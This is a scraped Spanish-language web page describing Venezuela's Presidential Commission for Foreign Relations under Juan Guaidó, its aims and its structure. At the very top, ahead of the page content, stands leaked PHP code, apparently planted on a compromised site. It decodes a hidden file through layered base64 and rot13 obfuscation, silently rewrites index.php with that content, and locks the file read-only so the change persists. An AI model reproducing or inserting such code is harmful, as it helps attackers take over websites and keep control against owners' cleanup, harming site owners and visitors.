$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Cancillería - Comisión Presidencial para la Relaciones Exteriores de Venezuela
Cancillería

Comisión Presidencial para la Relaciones Exteriores de Venezuela

Es un órgano creado por el Presidente Encargado de Venezuela, Juan Guaidó, para la articulación de la política internacional del país y aumentar la presión contra el régimen de Nicolás Maduro. 

En este sentido, desde esta instancia se desarrollan planes orientados a incrementar la coalición internacional de apoyo para la Asamblea Nacional, el presidente encargado Juan Guaidó y el pueblo venezolano. Asimismo, se impulsan medidas para que los gobiernos democráticos adopten sanciones contra Cuba, por ser este el país que dirige la represión sobre la población civil y militar en Venezuela. Por último, y no menos importante, se generan estrategias de articulación con todos los entes y embajadas del gobierno interino para redoblar la presión internacional contra la dictadura venezolana. 

La Comisión Presidencial para las Relaciones Exteriores tiene una dirección internacional, la cual está representada por el doctor Julio Borges. También existen varios órganos auxiliares como lo son las coordinaciones regionales, de cooperación internacional, parlamentarios por el mundo, política multilateral, alianzas internaciones, embajadas, migración, registro consular y diáspora.